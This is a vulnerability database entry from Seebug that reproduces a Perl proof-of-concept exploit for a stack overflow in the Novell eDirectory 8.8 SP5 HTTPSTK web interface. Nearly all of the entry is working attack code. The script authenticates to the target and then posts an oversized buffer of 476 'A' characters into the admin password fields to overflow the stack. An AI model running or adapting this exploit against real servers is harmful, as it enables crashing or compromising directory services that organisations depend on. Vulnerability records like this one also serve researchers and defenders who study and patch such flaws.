Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability

2009-11-17T00:00:00
ID SSV:18263
Type seebug
Reporter Root
Modified 2009-11-17T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # Exploit Title: Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability
# Date: 2009-11-17
# Author: karak0rsan
# Software Link: [downoad link if available]
# Version: Novell eDirectory 8.8 SP5 HTTPSTK
# Tested on: [relevant os]
# Code : [exploit code]

#!usr\bin\perl
# Novell eDirectory 8.8 SP5 HTTPSTK BoF Vuln - 0day
# Vulnerability found in Hellcode Labs.
# karak0rsan || murderkey
# info[at]hellcode.net || www.hellcode.net


use WWW::Mechanize;

use LWP::Debug qw(+);

use HTTP::Cookies;
use HTTP::Request::Common;;

$target=$ARGV[0];


if(!$ARGV[0]){

       print "Novell eDirectory 8.8 SP5 Exploit\n";

       print "Hellcode Research || Hellcode.net\n";

       print "Usage:perl $0 [target]\n";

exit();
}
         print "Username:";

         $username = <STDIN>;

         chomp($username);

         print "Password:";

         $password = <STDIN>;

         chomp($password);


$login_url = "$target/_LOGIN_SERVER_";

$url = "$target/dhost/httpstk;submit";

$buffer = "\x41" x 476;

my $mechanize = WWW::Mechanize->new();


$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));


$mechanize->timeout($url_timeout);

$res = $mechanize->request(HTTP::Request->new('GET', "$login_url"));


   $mechanize->submit_form(

                 form_name => "authenticator",

                 fields    => {

                    usr => $username,

                    pwd => $password},

                    button => 'Login');

$res2 = $mechanize->request(HTTP::Request->new('GET', "$url"));
$res2 = $mechanize->request(POST "$url", [sadminpwd => $buffer, verifypwd => $buffer]);